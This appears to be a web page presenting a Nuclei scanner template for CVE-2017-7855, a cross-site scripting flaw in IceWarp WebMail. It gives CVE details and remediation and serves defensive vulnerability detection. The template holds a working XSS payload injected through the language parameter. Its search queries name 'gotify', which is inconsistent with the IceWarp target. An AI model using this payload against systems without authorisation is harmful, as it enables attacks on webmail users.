Skip to content

IceWarp WebMail 11.3.1.5 - Cross-Site Scripting

ID: CVE-2017-7855

Severity: medium

Author: r3Y3r53

Tags: cve,cve2017,xss,icewarp

IceWarp WebMail 11.3.1.5 is vulnerable to cross-site scripting via the language parameter.

id: CVE-2017-7855
info:
name: IceWarp WebMail 11.3.1.5 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
IceWarp WebMail 11.3.1.5 is vulnerable to cross-site scripting via the language parameter.
remediation: Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail.
reference:
- https://technical.nttsecurity.com/post/102eegq/cookies-are-delicious
- https://nvd.nist.gov/vuln/detail/CVE-2017-7855
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-7855
cwe-id: CWE-79
epss-score: 0.0009
epss-percentile: 0.37043
cpe: cpe:2.3:a:icewarp:server:11.3.1.5:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: icewarp
product: server
shodan-query:
- title:"icewarp"
- http.title:"gotify"
fofa-query: title="gotify"
google-query: intitle:"gotify"
tags: cve,cve2017,xss,icewarp
http:
- method: GET
path:
- "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'lang=""><img src=x onerror=alert(document.domain)>'
- 'IceWarp'
condition: and
case-insensitive: true
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a0047304502210098173013e37e9d259c63a13aafbdb5daa2bed95f59bfe748407c9b12fac1216102201189e14eae6bf52de185008e4c84b546a7fda6cd0f452f145c1f85be6309a9d1:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-7855.yaml"

View on Github